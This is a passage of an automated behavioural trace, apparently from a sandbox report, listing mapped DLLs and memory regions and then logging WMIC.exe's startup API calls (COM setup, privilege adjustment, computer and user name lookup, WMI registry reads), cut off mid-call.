Region: id = 1611 start_va = 0x74b70000 end_va = 0x74b9ffff entry_point = 0x74b70000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 1612 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1613 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1614 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1615 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1616 start_va = 0x77090000 end_va = 0x77249fff entry_point = 0x77090000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1617 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1618 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1619 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1620 start_va = 0x77ad0000 end_va = 0x77ad6fff entry_point = 0x77ad0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 1621 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1622 start_va = 0x7e830000 end_va = 0x7e92ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e830000" filename = "" Region: id = 1623 start_va = 0x7e957000 end_va = 0x7e959fff entry_point = 0x0 region_type = private name = "private_0x000000007e957000" filename = "" Region: id = 1624 start_va = 0x76f60000 end_va = 0x76f6bfff entry_point = 0x76f60000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 1625 start_va = 0x9a0000 end_va = 0x9a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009a0000" filename = "" Region: id = 1626 start_va = 0x77760000 end_va = 0x777e1fff entry_point = 0x77760000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 1627 start_va = 0xac0000 end_va = 0xac0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ac0000" filename = "" Region: id = 1628 start_va = 0x74a20000 end_va = 0x74a2cfff entry_point = 0x74a20000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 1629 start_va = 0x77930000 end_va = 0x7798bfff entry_point = 0x77930000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1630 start_va = 0x749b0000 end_va = 0x74a15fff entry_point = 0x749b0000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 1631 start_va = 0x74af0000 end_va = 0x74b0afff entry_point = 0x74af0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 1632 start_va = 0xf50000 end_va = 0x1286fff entry_point = 0xf50000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1633 start_va = 0x77ba0000 end_va = 0x77c31fff entry_point = 0x77ba0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1634 start_va = 0xdb0000 end_va = 0xe98fff entry_point = 0xdb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1635 start_va = 0xbe0000 end_va = 0xbe3fff entry_point = 0x0 region_type = private name = "private_0x0000000000be0000" filename = "" Region: id = 1636 start_va = 0x74820000 end_va = 0x749affff entry_point = 0x74820000 region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\SysWOW64\\msxml3.dll" (normalized: "c:\\windows\\syswow64\\msxml3.dll") Region: id = 1637 start_va = 0xdb0000 end_va = 0xecffff entry_point = 0x0 region_type = private name = "private_0x0000000000db0000" filename = "" Region: id = 1638 start_va = 0x5370000 end_va = 0x550ffff entry_point = 0x0 region_type = private name = "private_0x0000000005370000" filename = "" Region: id = 1639 start_va = 0x5510000 end_va = 0x56bffff entry_point = 0x0 region_type = private name = "private_0x0000000005510000" filename = "" Region: id = 1640 start_va = 0xbf0000 end_va = 0xbfffff entry_point = 0x0 region_type = private name = "private_0x0000000000bf0000" filename = "" Region: id = 1641 start_va = 0xdb0000 end_va = 0xe7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000db0000" filename = "" Region: id = 1642 start_va = 0xec0000 end_va = 0xecffff entry_point = 0x0 region_type = private name = "private_0x0000000000ec0000" filename = "" Region: id = 1643 start_va = 0x5370000 end_va = 0x544efff entry_point = 0x5370000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 1644 start_va = 0x5500000 end_va = 0x550ffff entry_point = 0x0 region_type = private name = "private_0x0000000005500000" filename = "" Region: id = 1645 start_va = 0x56c0000 end_va = 0x5abffff entry_point = 0x0 region_type = private name = "private_0x00000000056c0000" filename = "" Region: id = 1646 start_va = 0xc00000 end_va = 0xc00fff entry_point = 0xc00000 region_type = mapped_file name = "msxml3r.dll" filename = "\\Windows\\SysWOW64\\msxml3r.dll" (normalized: "c:\\windows\\syswow64\\msxml3r.dll") Region: id = 1647 start_va = 0xc10000 end_va = 0xc2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 1648 start_va = 0x746c0000 end_va = 0x7481ffff entry_point = 0x746c0000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 1649 start_va = 0x77990000 end_va = 0x77a0afff entry_point = 0x77990000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1650 start_va = 0x778a0000 end_va = 0x7792cfff entry_point = 0x778a0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 1651 start_va = 0x75080000 end_va = 0x750c3fff entry_point = 0x75080000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1652 start_va = 0x76ca0000 end_va = 0x76decfff entry_point = 0x76ca0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1653 start_va = 0x74d70000 end_va = 0x74eaffff entry_point = 0x74d70000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1654 start_va = 0x743f0000 end_va = 0x746b0fff entry_point = 0x743f0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 1655 start_va = 0xc30000 end_va = 0xc59fff entry_point = 0xc30000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1656 start_va = 0x5510000 end_va = 0x5697fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005510000" filename = "" Region: id = 1657 start_va = 0x56b0000 end_va = 0x56bffff entry_point = 0x0 region_type = private name = "private_0x00000000056b0000" filename = "" Region: id = 1658 start_va = 0x775e0000 end_va = 0x7760afff entry_point = 0x775e0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1659 start_va = 0x76f70000 end_va = 0x7708ffff entry_point = 0x76f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1660 start_va = 0xc30000 end_va = 0xc3ffff entry_point = 0xc30000 region_type = mapped_file name = "wmic.exe.mui" filename = "\\Windows\\SysWOW64\\wbem\\en-US\\WMIC.exe.mui" (normalized: "c:\\windows\\syswow64\\wbem\\en-us\\wmic.exe.mui") Region: id = 1661 start_va = 0x5ac0000 end_va = 0x5c40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005ac0000" filename = "" Region: id = 1662 start_va = 0x5c50000 end_va = 0x704ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005c50000" filename = "" Region: id = 1663 start_va = 0xc40000 end_va = 0xc40fff entry_point = 0x0 region_type = private name = "private_0x0000000000c40000" filename = "" Region: id = 1664 start_va = 0xc50000 end_va = 0xc50fff entry_point = 0x0 region_type = private name = "private_0x0000000000c50000" filename = "" Region: id = 1665 start_va = 0x741c0000 end_va = 0x743e3fff entry_point = 0x741c0000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 1666 start_va = 0x77430000 end_va = 0x77519fff entry_point = 0x77430000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1667 start_va = 0x74bc0000 end_va = 0x74c34fff entry_point = 0x74bc0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1668 start_va = 0xdb0000 end_va = 0xe4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000db0000" filename = "" Region: id = 1669 start_va = 0xe70000 end_va = 0xe7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e70000" filename = "" Region: id = 1670 start_va = 0xc60000 end_va = 0xc60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c60000" filename = "" Region: id = 1671 start_va = 0x7050000 end_va = 0x7107fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007050000" filename = "" Region: id = 1672 start_va = 0xc60000 end_va = 0xc63fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c60000" filename = "" Region: id = 1673 start_va = 0x74ba0000 end_va = 0x74bbcfff entry_point = 0x74ba0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1674 start_va = 0x7110000 end_va = 0x720ffff entry_point = 0x0 region_type = private name = "private_0x0000000007110000" filename = "" Region: id = 1675 start_va = 0x74aa0000 end_va = 0x74ab2fff entry_point = 0x74aa0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 1676 start_va = 0x74a70000 end_va = 0x74a9efff entry_point = 0x74a70000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1677 start_va = 0xc70000 end_va = 0xcaffff entry_point = 0x0 region_type = private name = "private_0x0000000000c70000" filename = "" Region: id = 1678 start_va = 0xdb0000 end_va = 0xdeffff entry_point = 0x0 region_type = private name = "private_0x0000000000db0000" filename = "" Region: id = 1679 start_va = 0xdf0000 end_va = 0xe2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000df0000" filename = "" Region: id = 1680 start_va = 0xe40000 end_va = 0xe4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e40000" filename = "" Region: id = 1681 start_va = 0xe80000 end_va = 0xebffff entry_point = 0x0 region_type = private name = "private_0x0000000000e80000" filename = "" Region: id = 1682 start_va = 0xed0000 end_va = 0xf0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ed0000" filename = "" Region: id = 1683 start_va = 0x1290000 end_va = 0x12cffff entry_point = 0x0 region_type = private name = "private_0x0000000001290000" filename = "" Region: id = 1684 start_va = 0x7e82a000 end_va = 0x7e82cfff entry_point = 0x0 region_type = private name = "private_0x000000007e82a000" filename = "" Region: id = 1685 start_va = 0x7e82d000 end_va = 0x7e82ffff entry_point = 0x0 region_type = private name = "private_0x000000007e82d000" filename = "" Region: id = 1686 start_va = 0x7e954000 end_va = 0x7e956fff entry_point = 0x0 region_type = private name = "private_0x000000007e954000" filename = "" Region: id = 1687 start_va = 0x741a0000 end_va = 0x741b0fff entry_point = 0x741a0000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 1688 start_va = 0x740e0000 end_va = 0x7419bfff entry_point = 0x740e0000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 1689 start_va = 0xe50000 end_va = 0xe64fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e50000" filename = "" Region: id = 1690 start_va = 0xf10000 end_va = 0xf38fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f10000" filename = "" Thread: id = 137 os_tid = 0xc4c [0103.581] GetModuleHandleA (lpModuleName=0x0) returned 0x1300000 [0103.581] __set_app_type (_Type=0x1) [0103.581] __p__fmode () returned 0x77ac4d6c [0103.582] __p__commode () returned 0x77ac5b1c [0103.582] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x133aa90) returned 0x0 [0103.582] __wgetmainargs (in: _Argc=0x13491a8, _Argv=0x13491ac, _Env=0x13491b0, _DoWildCard=0, _StartInfo=0x13491bc | out: _Argc=0x13491a8, _Argv=0x13491ac, _Env=0x13491b0) returned 0 [0103.582] ??0CHString@@QAE@XZ () returned 0x13495ec [0103.582] ??0CHString@@QAE@XZ () returned 0x13498fc [0103.582] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0103.582] SetConsoleCtrlHandler (HandlerRoutine=0x1334980, Add=1) returned 1 [0103.582] _onexit (_Func=0x1340a20) returned 0x1340a20 [0103.582] _onexit (_Func=0x1340a30) returned 0x1340a30 [0103.582] _onexit (_Func=0x1340a50) returned 0x1340a50 [0103.583] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0103.583] ResolveDelayLoadedAPI () returned 0x770fcd50 [0103.583] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0103.584] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0103.616] CoCreateInstance (in: rclsid=0x1306a1c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x1306a2c*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x1349510 | out: ppv=0x1349510*=0xcc3330) returned 0x0 [0103.629] GetCurrentProcess () returned 0xffffffff [0103.629] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0xa4fbcc | out: TokenHandle=0xa4fbcc*=0x158) returned 1 [0103.629] GetTokenInformation (in: TokenHandle=0x158, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xa4fbc8 | out: TokenInformation=0x0, ReturnLength=0xa4fbc8) returned 0 [0103.629] GetTokenInformation (in: TokenHandle=0x158, TokenInformationClass=0x3, TokenInformation=0xf43a08, TokenInformationLength=0x118, ReturnLength=0xa4fbc8 | out: TokenInformation=0xf43a08, ReturnLength=0xa4fbc8) returned 1 [0103.629] AdjustTokenPrivileges (in: TokenHandle=0x158, DisableAllPrivileges=0, NewState=0xf43a08*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0103.629] CloseHandle (hObject=0x158) returned 1 [0103.629] SetThreadUILanguage (LangId=0x0) returned 0x409 [0103.633] _vsnwprintf (in: _Buffer=0xf43a98, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0xa4fb54 | out: _Buffer="ms_409") returned 6 [0103.633] GetComputerNameW (in: lpBuffer=0xf43ae0, nSize=0xa4fbb8 | out: lpBuffer="LHNIWSJ", nSize=0xa4fbb8) returned 1 [0103.633] lstrlenW (lpString="LHNIWSJ") returned 7 [0103.633] lstrlenW (lpString="LHNIWSJ") returned 7 [0103.633] ResolveDelayLoadedAPI () returned 0x74d5c5f0 [0103.633] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0xa4fbcc | out: lpNameBuffer=0x0, nSize=0xa4fbcc) returned 0x0 [0103.634] GetLastError () returned 0xea [0103.634] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0xf43b20, nSize=0xa4fbcc | out: lpNameBuffer="LHNIWSJ\\CIiHmnxMn6Ps", nSize=0xa4fbcc) returned 0x1 [0103.634] lstrlenW (lpString="") returned 0 [0103.634] lstrlenW (lpString="LHNIWSJ") returned 7 [0103.634] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="", cchCount2=0) returned 3 [0103.635] lstrlenW (lpString=".") returned 1 [0103.635] lstrlenW (lpString="LHNIWSJ") returned 7 [0103.635] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2=".", cchCount2=1) returned 3 [0103.635] lstrlenW (lpString="LOCALHOST") returned 9 [0103.635] lstrlenW (lpString="LHNIWSJ") returned 7 [0103.636] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="LOCALHOST", cchCount2=9) returned 1 [0103.636] lstrlenW (lpString="LHNIWSJ") returned 7 [0103.636] lstrlenW (lpString="LHNIWSJ") returned 7 [0103.636] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="LHNIWSJ", cchCount2=7) returned 2 [0103.636] lstrlenW (lpString="LHNIWSJ") returned 7 [0103.636] lstrlenW (lpString="LHNIWSJ") returned 7 [0103.636] lstrlenW (lpString="LHNIWSJ") returned 7 [0103.636] lstrlenW (lpString="LHNIWSJ") returned 7 [0103.636] ResolveDelayLoadedAPI () returned 0x77bb9840 [0103.638] SysStringLen (param_1="IDENTIFY") returned 0x8 [0103.638] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0103.638] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0103.638] SysStringLen (param_1="IDENTIFY") returned 0x8 [0103.638] SysStringLen (param_1="IMPERSONATE") returned 0xb [0103.638] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0103.638] SysStringLen (param_1="IMPERSONATE") returned 0xb [0103.638] SysStringLen (param_1="IDENTIFY") returned 0x8 [0103.638] SysStringLen (param_1="IDENTIFY") returned 0x8 [0103.638] SysStringLen (param_1="IMPERSONATE") returned 0xb [0103.638] SysStringLen (param_1="DELEGATE") returned 0x8 [0103.638] SysStringLen (param_1="IDENTIFY") returned 0x8 [0103.638] SysStringLen (param_1="DELEGATE") returned 0x8 [0103.638] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0103.638] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0103.638] SysStringLen (param_1="DELEGATE") returned 0x8 [0103.638] SysStringLen (param_1="NONE") returned 0x4 [0103.638] SysStringLen (param_1="DEFAULT") returned 0x7 [0103.638] SysStringLen (param_1="DEFAULT") returned 0x7 [0103.638] SysStringLen (param_1="NONE") returned 0x4 [0103.638] SysStringLen (param_1="CONNECT") returned 0x7 [0103.638] SysStringLen (param_1="DEFAULT") returned 0x7 [0103.639] SysStringLen (param_1="CALL") returned 0x4 [0103.639] SysStringLen (param_1="DEFAULT") returned 0x7 [0103.639] SysStringLen (param_1="CALL") returned 0x4 [0103.639] SysStringLen (param_1="CONNECT") returned 0x7 [0103.639] SysStringLen (param_1="PKT") returned 0x3 [0103.639] SysStringLen (param_1="DEFAULT") returned 0x7 [0103.639] SysStringLen (param_1="PKT") returned 0x3 [0103.639] SysStringLen (param_1="NONE") returned 0x4 [0103.639] SysStringLen (param_1="NONE") returned 0x4 [0103.639] SysStringLen (param_1="PKT") returned 0x3 [0103.639] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0103.639] SysStringLen (param_1="DEFAULT") returned 0x7 [0103.639] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0103.639] SysStringLen (param_1="NONE") returned 0x4 [0103.639] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0103.639] SysStringLen (param_1="PKT") returned 0x3 [0103.639] SysStringLen (param_1="PKT") returned 0x3 [0103.639] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0103.639] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0103.639] SysStringLen (param_1="DEFAULT") returned 0x7 [0103.639] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0103.639] SysStringLen (param_1="PKT") returned 0x3 [0103.639] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0103.639] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0103.639] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0103.639] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0103.640] GetSystemDirectoryW (in: lpBuffer=0xf429d8, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0103.640] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0103.640] SysStringLen (param_1="\\wbem\\") returned 0x6 [0103.640] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0103.640] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0103.640] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0103.640] GetCurrentThreadId () returned 0xc4c [0103.640] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0xa4f6dc | out: phkResult=0xa4f6dc*=0x164) returned 0x0 [0103.640] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0xa4f6e8, lpcbData=0xa4f6e4*=0x400 | out: lpType=0x0, lpData=0xa4f6e8*=0x30, lpcbData=0xa4f6e4*=0x4) returned 0x0 [0103.640] _wcsicmp (_String1="0", _String2="1") returned -1 [0103.640] _wcsicmp (_String1="0", _String2="2") returned -2 [0103.640] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xa4f6e4*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0xa4f6e4*=0x42) returned 0x0 [0103.640] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0xf42be0, lpcbData=0xa4f6e4*=0x42 | out: lpType=0x0, lpData=0xf42be0*=0x25, lpcbData=0xa4f6e4*=0x42) returned 0x0 [0103.640] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0103.640] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0103.640] RegQueryValueExW (in: hKey=0x164, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0xa4f6e8, lpcbData=0xa4f6e4*=0x400 | out: lpType=0x0, lpData=0xa4f6e8*=0x36, lpcbData=0xa4f6e4*=0xc) returned 0x0 [0103.640] _wtol (_String="65536") returned 65536 [0103.641] RegCloseKey (hKey=0x0) returned 0x6 [0103.641] CoCreateInstance (in: rclsid=0x1306a7c*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x1306a8c*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0xa4fb7c | out: ppv=0xa4fb7c*=0xec45a8) returned 0x0 [0103.649] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0xec45a8, xmlSource=0xa4fafc*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0xa4fb60 | out: isSuccessful=0xa4fb60*=0xffff) returned 0x0 [0103.766] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0xec45a8, DOMElement=0xa4fb74 | out: DOMElement=0xa4fb74) returned 0x0 [0103.767] SysStringLen (param_1="VALUE") returned 0x5 [0103.767] SysStringLen (param_1="TABLE") returned 0x5 [0103.767] SysStringLen (param_1="TABLE") returned 0x5 [0103.767] SysStringLen (param_1="VALUE") returned 0x5 [0103.768] SysStringLen (param_1="LIST") returned 0x4 [0103.768] SysStringLen (param_1="TABLE") returned 0x5 [0103.768] SysStringLen (param_1="RAWXML") returned 0x6 [0103.768] SysStringLen (param_1="TABLE") returned 0x5 [0103.768] SysStringLen (param_1="RAWXML") returned 